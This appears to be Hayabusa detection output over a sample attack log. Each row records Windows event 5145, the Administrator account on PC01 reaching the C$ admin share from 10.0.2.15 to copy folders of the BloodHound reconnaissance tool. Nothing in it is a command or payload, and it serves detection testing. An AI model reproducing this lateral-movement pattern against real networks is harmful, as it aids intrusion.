2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-is  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-is\cjs  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-is\umd  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-lifecycles-compat  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\__test__  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\__test__\__snapshots__  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\coverage  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\coverage\lcov-report  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\dist  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\docs  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\docs\examples  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\examples  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\examples\src  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\lib  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\src  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\__tests__  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\config  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\dist  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\node_modules  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\node_modules\react-prop-toggle  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-transition-group  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-transition-group\dist  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-transition-group\utils  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\doc  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\doc\wg-meetings  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\lib  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\lib\internal  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\regenerator-runtime  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\dist  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\src  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\src\shims  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\src\utils  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\rimraf  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\safe-buffer  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\scheduler  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\scheduler\cjs  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\scheduler\umd  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\setimmediate  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\signal-exit  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\ssf  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.359 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\ssf\bin  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.359 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-chain  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.359 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-chain\tests  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.369 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.369 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\filters  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.369 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\streamers  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.379 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\tests  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.379 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\utils  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.379 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\string_decoder  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.389 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\string_decoder\lib  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.389 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\text-encoding  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.389 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\text-encoding\lib  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.399 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\traverse  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.399 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\traverse\examples  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.399 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\traverse\test  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
